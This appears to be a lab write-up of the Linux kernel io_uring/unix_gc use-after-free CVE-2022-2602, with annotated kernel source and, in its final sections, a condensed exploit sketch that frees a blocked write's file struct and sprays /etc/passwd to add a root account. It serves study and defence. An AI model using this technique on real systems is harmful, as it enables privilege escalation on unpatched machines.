
DirtyFile+CVE-2022-2602

CVE-2022-2602

Linux version 5.13.1 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 11.4.0-2ubuntu1~20.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Wed Mar 13 11:24:24 CST 2024
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot -s
  • Mitigations enabled: SMEP, SMAP, KPTI, KASLR
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -t devpts devpts /dev/pts

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

The io_uring Module

io_uring places the I/O operations you want the kernel to perform into a queue; when the kernel has cycles to spare, it takes those I/O tasks from the queue and completes them. Once you believe the kernel has finished your tasks, you simply fetch the results from the result queue.

The ring used to submit tasks is called the SQ, and each task in it is an SQE; the ring used to fetch results is called the CQ, and each result in it is a CQE.

io_uring is implemented through the following three system calls (a minimal wrapper sketch follows this list):

  • io_uring_setup: initializes io_uring
    • sets up the two ring queues (SQ and CQ)
    • creates a file object for the io_uring instance (the returned file descriptor is later mmap'ed to access the two rings and to set up related resources)
  • io_uring_enter: tells the kernel that tasks have been submitted, or reaps task results
    • both submitting requests and fetching completions go through io_uring_enter
    • io_uring also offers a polling mode, IORING_SETUP_SQPOLL, in which the kernel checks the submission queue for new tasks and completes them on its own (using a kernel thread), so we do not have to call io_uring_enter ourselves
  • io_uring_register: registers shared buffers
    • associates file descriptors or memory regions with the io_uring instance
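
To make the interface concrete, here is a minimal, hedged sketch of raw wrappers for the three system calls plus a setup call (my example, not part of the exploit; the exploit later defines essentially the same wrappers). The entry count of 32 and the IORING_SETUP_SQPOLL flag are just example values.

#include <linux/io_uring.h>
#include <signal.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

static int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
    return syscall(__NR_io_uring_setup, entries, p);   /* returns the io_uring fd */
}

static int io_uring_enter(int fd, unsigned to_submit, unsigned min_complete,
                          unsigned flags, sigset_t *sig)
{
    return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig);
}

static int io_uring_register(int fd, unsigned opcode, void *arg, unsigned nr_args)
{
    return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

int main(void)
{
    struct io_uring_params params;

    memset(&params, 0, sizeof(params));
    params.flags = IORING_SETUP_SQPOLL;          /* a kernel thread polls the SQ for us */

    int ring_fd = io_uring_setup(32, &params);   /* 32 SQ entries */
    /* ring_fd would now be mmap'ed to reach the SQ/CQ rings (liburing does this for us) */
    return ring_fd < 0 ? 1 : 0;
}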

Install liburing to build liburing.a / liburing.so.2.2:

wget https://github.com/axboe/liburing/archive/liburing-2.2.zip
unzip liburing-2.2.zip && cd liburing-liburing-2.2
make
sudo make install

liburing provides a set of io_uring APIs:

#include <liburing.h>

struct io_uring_sqe *io_uring_get_sqe(struct io_uring *ring);
  • Gets the next available submission queue entry from the submission queue belonging to ring
  • Returns a pointer to the submission queue entry on success, or NULL on failure
#include <liburing.h>

int io_uring_submit(struct io_uring *ring);
  • Submits the pending events in ring's submission queue to the kernel
  • Returns the number of submission queue entries submitted on success, or -errno on failure

The caller first retrieves a submission queue entry with io_uring_get_sqe, then initializes the SQE (helper APIs can fill it in), and finally submits it with io_uring_submit.
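
As a quick illustration, here is a minimal, hedged liburing sketch of that workflow (my example, not from the original write-up): one write request is prepared, submitted, and its completion reaped. The path /tmp/demo.txt and the queue depth of 8 are arbitrary; link with -luring.

#include <fcntl.h>
#include <liburing.h>
#include <stdio.h>

int main(void)
{
    struct io_uring ring;
    struct io_uring_sqe *sqe;
    struct io_uring_cqe *cqe;
    const char buf[] = "hello from io_uring\n";

    if (io_uring_queue_init(8, &ring, 0) < 0)        /* SQ/CQ with 8 entries */
        return 1;

    int fd = open("/tmp/demo.txt", O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return 1;

    sqe = io_uring_get_sqe(&ring);                   /* grab a free SQE */
    io_uring_prep_write(sqe, fd, buf, sizeof(buf) - 1, 0);  /* describe the write */

    io_uring_submit(&ring);                          /* io_uring_enter under the hood */

    io_uring_wait_cqe(&ring, &cqe);                  /* block until the CQE arrives */
    printf("write returned %d\n", cqe->res);
    io_uring_cqe_seen(&ring, cqe);                   /* mark the CQE as consumed */

    io_uring_queue_exit(&ring);
    return 0;
}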

The io_uring_enter function used to submit requests:

SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit, u32,
min_complete, u32, flags, const void __user *, argp, size_t,
argsz)
{

......

if (ctx->flags & IORING_SETUP_SQPOLL) {

......

} else if (to_submit) {
ret = io_uring_add_task_file(ctx);
if (unlikely(ret))
goto out;
mutex_lock(&ctx->uring_lock);
submitted = io_submit_sqes(ctx, to_submit); /* core function */
mutex_unlock(&ctx->uring_lock);

if (submitted != to_submit)
goto out;
}
if (flags & IORING_ENTER_GETEVENTS) {

......

}

out:
percpu_ref_put(&ctx->refs);
out_fput:
fdput(f);
return submitted ? submitted : ret;
}
static int io_submit_sqes(struct io_ring_ctx *ctx, unsigned int nr)
{
int submitted = 0;

/* make sure SQ entry isn't read before tail */
nr = min3(nr, ctx->sq_entries, io_sqring_entries(ctx));

if (!percpu_ref_tryget_many(&ctx->refs, nr))
return -EAGAIN;

percpu_counter_add(&current->io_uring->inflight, nr);
refcount_add(nr, &current->usage);
io_submit_state_start(&ctx->submit_state, nr);

while (submitted < nr) { /* process every request */
const struct io_uring_sqe *sqe; /* one SQE (a submitted request) */
struct io_kiocb *req;

req = io_alloc_req(ctx);
if (unlikely(!req)) {
if (!submitted)
submitted = -EAGAIN;
break;
}
sqe = io_get_sqe(ctx); /* fetch the user-supplied io_uring_sqe */
if (unlikely(!sqe)) {
kmem_cache_free(req_cachep, req);
break;
}
/* will complete beyond this point, count as submitted */
submitted++;
if (io_submit_sqe(ctx, req, sqe)) /* core function (handles the submitted request) */
break;
}

if (unlikely(submitted != nr)) {
int ref_used = (submitted == -EAGAIN) ? 0 : submitted;
struct io_uring_task *tctx = current->io_uring;
int unused = nr - ref_used;

percpu_ref_put_many(&ctx->refs, unused);
percpu_counter_sub(&tctx->inflight, unused);
put_task_struct_many(current, unused);
}

io_submit_state_end(&ctx->submit_state, ctx);
/* Commit SQ ring head once we've consumed and submitted all SQEs */
io_commit_sqring(ctx);

return submitted;
}
static int io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req,
const struct io_uring_sqe *sqe)
{
/* the io_uring_sqe here is filled in and passed by user space */
struct io_submit_link *link = &ctx->submit_state.link;
int ret;

ret = io_init_req(ctx, req, sqe); /* initialize the request (copy the sqe's fields into req) */
if (unlikely(ret)) {
fail_req:
if (link->head) {
/* fail even hard links since we don't submit */
link->head->flags |= REQ_F_FAIL_LINK;
io_req_complete_failed(link->head, -ECANCELED);
link->head = NULL;
}
io_req_complete_failed(req, ret);
return ret;
}
ret = io_req_prep(req, sqe); /* prepare the request; the file permission check happens here */
if (unlikely(ret))
goto fail_req;

/* don't need @sqe from now on */
trace_io_uring_submit_sqe(ctx, req->opcode, req->user_data, true,
ctx->flags & IORING_SETUP_SQPOLL);

/*
* If we already have a head request, queue this one for async
* submittal once the head completes. If we don't have a head but
* IOSQE_IO_LINK is set in the sqe, start a new head. This one will be
* submitted sync once the chain is complete. If none of those
* conditions are true (normal request), then just queue it.
*/
if (link->head) {
struct io_kiocb *head = link->head;

/*
* Taking sequential execution of a link, draining both sides
* of the link also fullfils IOSQE_IO_DRAIN semantics for all
* requests in the link. So, it drains the head and the
* next after the link request. The last one is done via
* drain_next flag to persist the effect across calls.
*/
if (req->flags & REQ_F_IO_DRAIN) {
head->flags |= REQ_F_IO_DRAIN;
ctx->drain_next = 1;
}
ret = io_req_prep_async(req);
if (unlikely(ret))
goto fail_req;
trace_io_uring_link(ctx, req, head);
link->last->link = req;
link->last = req;

/* last request of a link, enqueue the link */
if (!(req->flags & (REQ_F_LINK | REQ_F_HARDLINK))) {
io_queue_sqe(head);
link->head = NULL;
}
} else {
if (unlikely(ctx->drain_next)) {
req->flags |= REQ_F_IO_DRAIN;
ctx->drain_next = 0;
}
if (req->flags & (REQ_F_LINK | REQ_F_HARDLINK)) {
link->head = req;
link->last = req;
} else {
io_queue_sqe(req); /* try to execute the submitted request */
}
}

return 0;
}
  • The file permissions are checked first, and io_queue_sqe is then invoked, giving the following call chain:
io_queue_sqe->__io_queue_sqe->io_issue_sqe
  • io_issue_sqe dispatches to a different handler depending on req->opcode, and those handlers may block on the inode lock
  • Since the permission check has already been performed, if the file struct is illegitimately freed while the request is blocked, there is a DirtyFile-style risk

The io_init_req function that initializes a submitted request:

static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
const struct io_uring_sqe *sqe)
{
struct io_submit_state *state;
unsigned int sqe_flags;
int personality, ret = 0;

req->opcode = READ_ONCE(sqe->opcode);
/* same numerical values with corresponding REQ_F_*, safe to copy */
req->flags = sqe_flags = READ_ONCE(sqe->flags);
req->user_data = READ_ONCE(sqe->user_data);
req->async_data = NULL;
req->file = NULL;
req->ctx = ctx;
req->link = NULL;
req->fixed_rsrc_refs = NULL;
/* one is dropped after submission, the other at completion */
atomic_set(&req->refs, 2);
req->task = current;
req->result = 0;
req->work.creds = NULL;

/* enforce forwards compatibility on users */
if (unlikely(sqe_flags & ~SQE_VALID_FLAGS))
return -EINVAL;
if (unlikely(req->opcode >= IORING_OP_LAST))
return -EINVAL;
if (unlikely(!io_check_restriction(ctx, req, sqe_flags)))
return -EACCES;

if ((sqe_flags & IOSQE_BUFFER_SELECT) &&
!io_op_defs[req->opcode].buffer_select)
return -EOPNOTSUPP;

personality = READ_ONCE(sqe->personality);
if (personality) {
req->work.creds = xa_load(&ctx->personalities, personality);
if (!req->work.creds)
return -EINVAL;
get_cred(req->work.creds);
}
state = &ctx->submit_state;

/*
* Plug now if we have more than 1 IO left after this, and the target
* is potentially a read/write to block based storage.
*/
if (!state->plug_started && state->ios_left > 1 &&
io_op_defs[req->opcode].plug) {
blk_start_plug(&state->plug);
state->plug_started = true;
}

if (io_op_defs[req->opcode].needs_file) {
bool fixed = req->flags & REQ_F_FIXED_FILE; /* REQ_F_FIXED_FILE corresponds to the user-supplied IOSQE_FIXED_FILE and means the ctx owns the file struct */

req->file = io_file_get(state, req, READ_ONCE(sqe->fd), fixed);
if (unlikely(!req->file))
ret = -EBADF;
}

state->ios_left--;
return ret;
}
  • When user space sets io_uring_sqe->flags = IOSQE_FIXED_FILE, io_uring_sqe->fd is no longer the file descriptor io_uring should operate on, but the index of the corresponding file in skb->fp->fp (see the user-space sketch after the io_file_get listing below)
static struct file *io_file_get(struct io_submit_state *state,
struct io_kiocb *req, int fd, bool fixed)
{
struct io_ring_ctx *ctx = req->ctx;
struct file *file;

if (fixed) {
unsigned long file_ptr;

if (unlikely((unsigned int)fd >= ctx->nr_user_files))
return NULL;
fd = array_index_nospec(fd, ctx->nr_user_files);
file_ptr = io_fixed_file_slot(&ctx->file_table, fd)->file_ptr; /* look up the file struct's address by index */
file = (struct file *)(file_ptr & FFS_MASK);
file_ptr &= ~FFS_MASK;
/* mask in overlapping REQ_F and FFS bits */
req->flags |= (file_ptr << REQ_F_ASYNC_READ_BIT);
io_req_set_rsrc_node(req);
} else {
trace_io_uring_file_get(ctx, fd);
file = __io_file_get(state, fd); /* __io_file_get simply calls fget(fd) to obtain the file struct */

/* we don't allow fixed io_uring files */
if (file && unlikely(file->f_op == &io_uring_fops))
io_req_track_inflight(req);
}

return file;
}
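
To see the fixed-file path from user space, here is a hedged liburing sketch (my example, not from the original write-up): two files are registered with IORING_REGISTER_FILES, and the subsequent write passes an index into the registered table rather than a real descriptor. The paths are arbitrary; link with -luring.

#include <fcntl.h>
#include <liburing.h>

int main(void)
{
    struct io_uring ring;
    struct io_uring_sqe *sqe;
    struct io_uring_cqe *cqe;
    int fds[2];
    const char buf[] = "fixed-file write\n";

    io_uring_queue_init(8, &ring, 0);

    fds[0] = open("/tmp/a.txt", O_RDWR | O_CREAT, 0644);
    fds[1] = open("/tmp/b.txt", O_RDWR | O_CREAT, 0644);
    io_uring_register_files(&ring, fds, 2);          /* IORING_REGISTER_FILES under the hood */

    sqe = io_uring_get_sqe(&ring);
    io_uring_prep_write(sqe, 1, buf, sizeof(buf) - 1, 0);   /* 1 is a table index, not an fd */
    io_uring_sqe_set_flags(sqe, IOSQE_FIXED_FILE);   /* interpret sqe->fd as an index */

    io_uring_submit(&ring);
    io_uring_wait_cqe(&ring, &cqe);                  /* cqe->res is the write result (goes to /tmp/b.txt) */
    io_uring_cqe_seen(&ring, cqe);

    io_uring_queue_exit(&ring);
    return 0;
}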

The io_uring_register system call used for registration:

SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)
{
struct io_ring_ctx *ctx;
long ret = -EBADF;
struct fd f;

f = fdget(fd);
if (!f.file)
return -EBADF;

ret = -EOPNOTSUPP;
if (f.file->f_op != &io_uring_fops)
goto out_fput;

ctx = f.file->private_data;

io_run_task_work();

mutex_lock(&ctx->uring_lock);
ret = __io_uring_register(ctx, opcode, arg, nr_args); /* core function */
mutex_unlock(&ctx->uring_lock);
trace_io_uring_register(ctx, opcode, ctx->nr_user_files, ctx->nr_user_bufs,
ctx->cq_ev_fd != NULL, ret);
out_fput:
fdput(f);
return ret;
}
static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;

......

case IORING_REGISTER_FILES:
ret = io_sqe_files_register(ctx, arg, nr_args, NULL); /* core function */
break;

......

if (io_register_op_must_quiesce(opcode)) {
/* bring the ctx back to life */
percpu_ref_reinit(&ctx->refs);
reinit_completion(&ctx->ref_comp);
}
return ret;
}
static int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
unsigned nr_args, u64 __user *tags)
{
__s32 __user *fds = (__s32 __user *) arg;
struct file *file;
int fd, ret;
unsigned i;
struct io_rsrc_data *file_data;

if (ctx->file_data)
return -EBUSY;
if (!nr_args)
return -EINVAL;
if (nr_args > IORING_MAX_FIXED_FILES)
return -EMFILE;
ret = io_rsrc_node_switch_start(ctx);
if (ret)
return ret;

file_data = io_rsrc_data_alloc(ctx, io_rsrc_file_put, nr_args);
if (!file_data)
return -ENOMEM;
ctx->file_data = file_data;
ret = -ENOMEM;
if (!io_alloc_file_tables(&ctx->file_table, nr_args))
goto out_free;

for (i = 0; i < nr_args; i++, ctx->nr_user_files++) {
/* iterate over every user-supplied file descriptor */
u64 tag = 0;

if ((tags && copy_from_user(&tag, &tags[i], sizeof(tag))) ||
copy_from_user(&fd, &fds[i], sizeof(fd))) { /* read the user-supplied fd */
ret = -EFAULT;
goto out_fput;
}
/* allow sparse sets */
if (fd == -1) {
ret = -EINVAL;
if (unlikely(tag))
goto out_fput;
continue;
}

file = fget(fd); /* get the file struct; fget bumps the file's refcount */
ret = -EBADF;
if (unlikely(!file))
goto out_fput;

/*
* Don't allow io_uring instances to be registered. If UNIX
* isn't enabled, then this causes a reference cycle and this
* instance can never get freed. If UNIX is enabled we'll
* handle it just fine, but there's still no point in allowing
* a ring fd as it doesn't support regular read/write anyway.
*/
if (file->f_op == &io_uring_fops) {
fput(file);
goto out_fput;
}
ctx->file_data->tags[i] = tag;
io_fixed_file_set(io_fixed_file_slot(&ctx->file_table, i), file);
}

ret = io_sqe_files_scm(ctx); /* core function */

......

return ret;
}
static int io_sqe_files_scm(struct io_ring_ctx *ctx)
{
unsigned left, total;
int ret = 0;

total = 0;
left = ctx->nr_user_files;
while (left) { /* iterate over all registered files */
unsigned this_files = min_t(unsigned, left, SCM_MAX_FD);

ret = __io_sqe_files_scm(ctx, this_files, total); /* core function */
if (ret)
break;
left -= this_files;
total += this_files;
}

if (!ret)
return 0;

while (total < ctx->nr_user_files) {
struct file *file = io_file_from_index(ctx, total);

if (file)
fput(file);
total++;
}

return ret;
}
static int __io_sqe_files_scm(struct io_ring_ctx *ctx, int nr, int offset)
{
struct sock *sk = ctx->ring_sock->sk;
struct scm_fp_list *fpl;
struct sk_buff *skb;
int i, nr_files;

fpl = kzalloc(sizeof(*fpl), GFP_KERNEL);
if (!fpl)
return -ENOMEM;

skb = alloc_skb(0, GFP_KERNEL); /* allocate an sk_buff */
if (!skb) {
kfree(fpl);
return -ENOMEM;
}

skb->sk = sk;

nr_files = 0;
fpl->user = get_uid(current_user());
for (i = 0; i < nr; i++) { /* iterate over the files */
struct file *file = io_file_from_index(ctx, i + offset); /* get the file struct */

if (!file)
continue;
fpl->fp[nr_files] = get_file(file); /* get_file also bumps the refcount; the file is recorded in fpl */
unix_inflight(fpl->user, fpl->fp[nr_files]); /* account the file as in flight; for sock-backed files this bumps the inflight count */
nr_files++;
}

if (nr_files) {
fpl->max = SCM_MAX_FD;
fpl->count = nr_files;
UNIXCB(skb).fp = fpl; /* the skb keeps all user-supplied file structs in skb->fp->fp */
skb->destructor = unix_destruct_scm;
refcount_add(skb->truesize, &sk->sk_wmem_alloc);
skb_queue_head(&sk->sk_receive_queue, skb); /* queue the skb onto sk_receive_queue (the io_uring socket's receive queue) */

for (i = 0; i < nr_files; i++)
fput(fpl->fp[i]); /* fput these files to balance the get_file above */
} else {
kfree_skb(skb);
kfree(fpl);
}

return 0;
}
  • All user-supplied file descriptors end up stored in skb->fp->fp; if that skb is destroyed, fput is called on every file struct stored in skb->fp->fp
  • sk_receive_queue is the queue of messages that a socket has not yet received

Reference Counts and In-Flight Counts

In Linux, the file struct describes an open file; its file->f_count member records the number of references to it.

  • Several file descriptors may refer to the same file struct (multiple processes opening the same file, or descriptors duplicated with dup())
  • open, dup, and fork increase file->f_count; close and exit decrease it; when file->f_count reaches 0, the file struct is freed

The kernel functions that actually change a file's reference count are:

  • fget(): looks up the struct file from a file descriptor and increments its reference count
  • get_file(): takes a struct file and returns it, simply incrementing the reference count
  • fput(): decrements the reference count; when it drops to 0, the struct file is released

SCM_RIGHTS messages can carry file descriptors: through the sendmsg system call, the Linux kernel can pass an SCM_RIGHTS message and thereby hand a file descriptor from one process to a completely unrelated one (a receive-side sketch follows the list below).

  • The intended use is for a process that is allowed to open a file to open it and then hand it to a process that is not allowed to
  • When the sender passes a file descriptor to the receiver, SCM_RIGHTS creates a reference to the file struct
  • Once the receiver actually receives the descriptor, the reference created by SCM_RIGHTS is dropped
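
For completeness, here is a hedged sketch of the receive side of SCM_RIGHTS (my example; the exploit below only needs the send side, implemented in its sendfd() helper): recvmsg() pulls the transferred descriptor out of the control message, and only at that point is the in-flight reference dropped.

#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

/* Receive one fd over an AF_UNIX socket; returns the new fd or -1. */
int recvfd(int s)
{
    struct msghdr msg;
    struct cmsghdr *cmsg;
    char cbuf[CMSG_SPACE(sizeof(int))];
    char data;
    struct iovec io = { .iov_base = &data, .iov_len = 1 };
    int fd = -1;

    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &io;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof(cbuf);

    if (recvmsg(s, &msg, 0) < 0)                     /* receive one datagram */
        return -1;

    cmsg = CMSG_FIRSTHDR(&msg);                      /* the SCM_RIGHTS control message */
    if (cmsg && cmsg->cmsg_level == SOL_SOCKET && cmsg->cmsg_type == SCM_RIGHTS)
        memcpy(&fd, CMSG_DATA(cmsg), sizeof(fd));    /* the descriptor, renumbered in this process */

    return fd;
}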

Using SCM_RIGHTS can cause a memory leak:

(1) The process creates sockets A and B   (fileA->f_count=1, fileB->f_count=1)
(2) Send socket A to socket B             (fileA->f_count=2, fileB->f_count=1)
(3) Send socket B to socket A             (fileA->f_count=2, fileB->f_count=2)
(4) Close socket A                        (fileA->f_count=1, fileB->f_count=2)
(5) Close socket B                        (fileA->f_count=1, fileB->f_count=1)
  • Because the SCM_RIGHTS messages that socket A and socket B sent to each other are never received, fileA->f_count and fileB->f_count both stay at 1, and there is no way to ever release them (a hedged sketch of this cycle follows)
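
A hedged sketch of that unbreakable cycle (my example, using a socketpair rather than two independently connected sockets): each socket's fd is sent into the other's receive queue and both are then closed, so neither f_count can reach zero on its own.

#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Send an fd over an AF_UNIX datagram socket via SCM_RIGHTS. */
static void send_fd(int via, int fd)
{
    struct msghdr msg;
    struct cmsghdr *cmsg;
    char cbuf[CMSG_SPACE(sizeof(int))];

    memset(&msg, 0, sizeof(msg));
    memset(cbuf, 0, sizeof(cbuf));
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof(cbuf);
    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));
    sendmsg(via, &msg, 0);                 /* the fd is now "in flight" */
}

int main(void)
{
    int s[2];

    socketpair(AF_UNIX, SOCK_DGRAM, 0, s); /* A = s[0], B = s[1] */
    send_fd(s[0], s[0]);                   /* A's fd lands in B's receive queue */
    send_fd(s[1], s[1]);                   /* B's fd lands in A's receive queue */
    close(s[0]);                           /* f_count drops to 1, not 0 */
    close(s[1]);                           /* same; only the kernel's GC can reclaim them */
    return 0;
}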

The unix_inflight function increments the in-flight count:

void unix_inflight(struct user_struct *user, struct file *fp)
{
struct sock *s = unix_get_socket(fp); /* only socket and io_uring fds resolve to a sock */

spin_lock(&unix_gc_lock);

if (s) { /* for sock-backed files, bump the in-flight count */
struct unix_sock *u = unix_sk(s);

if (atomic_long_inc_return(&u->inflight) == 1) {
BUG_ON(!list_empty(&u->link));
list_add_tail(&u->link, &gc_inflight_list); /* add to the global gc_inflight_list */
} else {
BUG_ON(list_empty(&u->link));
}
unix_tot_inflight++; /* global count of in-flight files +1 */
}
user->unix_inflight++; /* per-user in-flight count +1 */
spin_unlock(&unix_gc_lock);
}

Kernel Garbage Collection

The kernel's garbage collector exists to prevent memory exhaustion in exactly this situation; the in-flight count was introduced to identify potential garbage.

  • When a file descriptor is sent in an SCM_RIGHTS datagram, the kernel puts its unix_sock on the global list gc_inflight_list and increments unix_tot_inflight (the total number of in-flight sockets)
  • The kernel then increments that socket's u->inflight (the number of times it is currently being passed), along with the per-user counter user->unix_inflight

Even after introducing the in-flight count, unbreakable cycles can still occur:

(1) The process creates sockets A and B   (ref=1 inflight=0, ref=1 inflight=0)
(2) Send socket A to socket B             (ref=2 inflight=1, ref=1 inflight=0)
(3) Send socket B to socket A             (ref=2 inflight=1, ref=2 inflight=1)
(4) Close socket A                        (ref=1 inflight=1, ref=2 inflight=1)
(5) Close socket B                        (ref=1 inflight=1, ref=1 inflight=1)
  • When the reference count of both A and B equals each socket's in-flight count, that is a sign that garbage may exist

The core garbage-collection routine in Linux is the following:

void unix_gc(void)
{
struct unix_sock *u;
struct unix_sock *next;
struct sk_buff_head hitlist;
struct list_head cursor;
LIST_HEAD(not_cycle_list);

spin_lock(&unix_gc_lock);

/* Avoid a recursive GC. */
if (gc_in_progress)
goto out;

gc_in_progress = true;
/* First, select candidates for garbage collection. Only
* in-flight sockets are considered, and from those only ones
* which don't have any external reference.
*
* Holding unix_gc_lock will protect these candidates from
* being detached, and hence from gaining an external
* reference. Since there are no possible receivers, all
* buffers currently on the candidates' queues stay there
* during the garbage collection.
*
* We also know that no new candidate can be added onto the
* receive queues. Other, non candidate sockets _can_ be
* added to queue, so we must make sure only to touch
* candidates.
*/
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
/* walk every member of the global gc_inflight_list */
long total_refs;
long inflight_refs;

total_refs = file_count(u->sk.sk_socket->file); /* read the file's reference count */
inflight_refs = atomic_long_read(&u->inflight); /* read the file's in-flight count */

BUG_ON(inflight_refs < 1);
BUG_ON(total_refs < inflight_refs);
if (total_refs == inflight_refs) { /* refcount equal to in-flight count: mark as a GC candidate */
list_move_tail(&u->link, &gc_candidates);
__set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
}
}

/* Now remove all internal in-flight reference to children of
* the candidates.
*/
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, dec_inflight, NULL);

/* Restore the references for children of all candidates,
* which have remaining references. Do this recursively, so
* only those remain, which form cyclic references.
*
* Use a "cursor" link, to make the list traversal safe, even
* though elements might be moved about.
*/
list_add(&cursor, &gc_candidates);
while (cursor.next != &gc_candidates) {
u = list_entry(cursor.next, struct unix_sock, link);

/* Move cursor to after the current position. */
list_move(&cursor, &u->link);

if (atomic_long_read(&u->inflight) > 0) {
list_move_tail(&u->link, &not_cycle_list);
__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
scan_children(&u->sk, inc_inflight_move_tail, NULL);
}
}
list_del(&cursor);

/* Now gc_candidates contains only garbage. Restore original
* inflight counters for these as well, and remove the skbuffs
* which are creating the cycle(s).
*/
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a
* cycle. Restore these to the inflight list.
*/
while (!list_empty(&not_cycle_list)) {
u = list_entry(not_cycle_list.next, struct unix_sock, link);
__clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
list_move_tail(&u->link, &gc_inflight_list);
}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */
__skb_queue_purge(&hitlist); /* free the garbage */

spin_lock(&unix_gc_lock);

/* All candidates should have been detached by now. */
BUG_ON(!list_empty(&gc_candidates));
gc_in_progress = false;
wake_up(&unix_gc_wait);

out:
spin_unlock(&unix_gc_lock);
}
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
struct sk_buff *skb;
while ((skb = __skb_dequeue(list)) != NULL)
kfree_skb(skb);
}
  • Garbage collection frees every skb belonging to sockets whose reference count equals their in-flight count, and calls fput on every file held in those skbs

Vulnerability Analysis

Affected versions: Linux kernel < v6.0.3 (fixed in v6.0.3)

The effect of the bug is that the target file is illegitimately freed before io_uring performs the I/O task; the core idea resembles DirtyFile:

  • Have another thread open the file that io_uring is going to write to, ahead of time
  • Free that file's file struct while io_uring is blocked
  • Heap-spray file structs of a different file to reclaim the freed slot
  • When the other thread releases the inode lock, io_uring acquires it and writes into the (now replaced) target file

How can the file struct io_uring is about to operate on be freed while io_uring is blocked? In theory io_uring always holds one reference, so the target file's reference count should never reach 0.

However, when unix_gc frees an skb it calls fput on every file in that skb, without considering that an io_uring request on one of those files may still be blocked (a logic bug). The file can therefore be freed before the blocked request completes, resulting in a use-after-free.

Exploitation Approach

Triggering the bug is fairly involved; after studying many public write-ups and exploits, the key code boils down to the following:

socketpair(AF_UNIX, SOCK_DGRAM, 0, s); /* create a socket pair (s[0], s[1]); each file starts with refcount 1 */

fd = io_uring_setup(32, params); /* get an io_uring fd; initial refcount 1 */

rfd[0] = s[1];
rfd[1] = open("/tmp/rwA", O_RDWR | O_CREAT | O_APPEND, 0644); /* open an ordinary read/write file; initial refcount 1 */
io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); /* register s[1] and rfd[1] into fd via io_uring_register */
/*
An skb for s[1] and rfd[1] is generated and queued on fd's sk->sk_receive_queue;
the file structs of s[1] and rfd[1] are both stored in skb->fp->fp
> s[1]:   refcount 2, inflight 1
> rfd[1]: refcount 2, inflight 0
> fd:     refcount 1, inflight 0
*/

close(rfd[1]); /* close rfd[1]; its refcount drops to 1 */

sendfd(s[0], fd); /* send fd from s[0] to s[1]; fd now has refcount 2, inflight 1 */

close(s[0]); /* refcount 0, freed */
close(s[1]); /* refcount 1, inflight 1, not freed for now */

pthread_create(&t, NULL, slow_write, NULL);
/*
First write a large amount of data into "/tmp/rwA" to take the inode lock,
then submit a file-write (writev) request to fd (io_uring) that writes malicious
data (a new root account and password) into "/tmp/rwA".
That request blocks after the file permission check but before the actual write.
*/

io_uring_queue_exit(&ring); /* close fd; its refcount becomes 1 (io_uring is not freed yet and keeps working) */

if(!fork()){ /* create and close a socket to trigger garbage collection (unix_gc) */
close(socket(AF_UNIX, SOCK_DGRAM, 0));
exit(0);
}

int tfd = open("/etc/passwd", O_RDONLY | O_DIRECT);
for(int i =0; i < 600; i++){
open("/etc/passwd", O_RDONLY);
}

close(fd);

The trigger flow is as follows:

Thread A                                                                                                  | Thread B
Does the preparation work                                                                                 |
Starts thread B                                                                                           | Opens "/tmp/rwA" and writes a large amount of data (0x80000 * 0x1000 bytes)
Opens "/tmp/rwA" and submits a write of malicious data (a new root account and password) to io_uring      | Passes the file permission check and acquires the inode lock
Passes the file permission check, then waits for the inode lock (io_uring blocks)                         | Long write in progress... (holds the lock)
Triggers garbage collection (unix_gc), freeing the target file struct before the inode lock is acquired   | Long write in progress... (holds the lock)
Opens "/etc/passwd" many times to heap-spray over the just-freed file struct                              | Releases the inode lock
Acquires the inode lock, but actually writes into "/etc/passwd" (the file struct has been replaced)       |
  • io_uring blocks because thread B holds the inode lock on "/tmp/rwA"
  • The blocked window is used to trigger garbage collection, which frees the blocked request's file struct and creates a UAF
  • Opening "/etc/passwd" a large number of times sprays its file structs over the freed slot
